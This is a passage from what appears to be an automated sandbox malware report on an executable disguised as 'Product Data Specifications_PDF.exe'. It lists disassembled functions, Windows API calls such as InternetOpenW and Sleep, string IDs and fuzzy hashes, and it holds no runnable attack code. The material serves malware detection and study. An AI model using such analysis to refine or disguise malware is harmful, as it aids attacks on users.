                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                              • String ID: LPT
                              • API String ID: 3035604524-1350329615
                              • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                              • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                              • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                              • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                              Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \$h
                              • API String ID: 4104443479-677774858
                              • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                              • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                              • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                              • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                              Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memcmp
                              • String ID: &
                              • API String ID: 2931989736-1010288
                              • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                              • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                              • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                              • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                              Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                              • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                              • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                              • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                              Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                              Download Yara Rule
                              APIs
                              • _wcslen.LIBCMT ref: 00466825
                              • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CrackInternet_wcslen
                              • String ID: |
                              • API String ID: 596671847-2343686810
                              • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                              • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                              • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                              • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                              Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: '
                              • API String ID: 3850602802-1997036262
                              • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                              • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                              • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                              • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                              Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • _strlen.LIBCMT ref: 0040F858
                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                              • _sprintf.LIBCMT ref: 0040F9AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove$_sprintf_strlen
                              • String ID: %02X
                              • API String ID: 1921645428-436463671
                              • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                              • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                              • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                              • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                              Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: Combobox
                              • API String ID: 3850602802-2096851135
                              • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                              • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                              • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                              • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                              Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: LengthMessageSendTextWindow
                              • String ID: edit
                              • API String ID: 2978978980-2167791130
                              • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                              • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                              • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                              • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                              Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00476CB0
                              • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: GlobalMemorySleepStatus
                              • String ID: @
                              • API String ID: 2783356886-2766056989
                              • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                              • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                              • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                              • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                              Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: htonsinet_addr
                              • String ID: 255.255.255.255
                              • API String ID: 3832099526-2422070025
                              • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                              • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                              • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                              • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                              Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID: <local>
                              • API String ID: 2038078732-4266983199
                              • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                              • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                              • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                              • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                              Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fread_nolock_memmove
                              • String ID: EA06
                              • API String ID: 1988441806-3962188686
                              • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                              • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                              • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                              • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                              Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: u,D
                              • API String ID: 4104443479-3858472334
                              • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                              • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                              • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                              • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                              Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • wsprintfW.USER32 ref: 0045612A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend_mallocwsprintf
                              • String ID: %d/%02d/%02d
                              • API String ID: 1262938277-328681919
                              • Opcode ID: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                              • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                              • Opcode Fuzzy Hash: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                              • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                              Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetCloseHandle.WININET(?), ref: 00442663
                              • InternetCloseHandle.WININET ref: 00442668
                                • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CloseHandleInternet$ObjectSingleWait
                              • String ID: aeB
                              • API String ID: 857135153-906807131
                              • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                              • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                              • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                              • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                              Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • ^B, xrefs: 00433248
                              • C:\Users\user\Desktop\Product Data Specifications_PDF.exe, xrefs: 0043324B
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
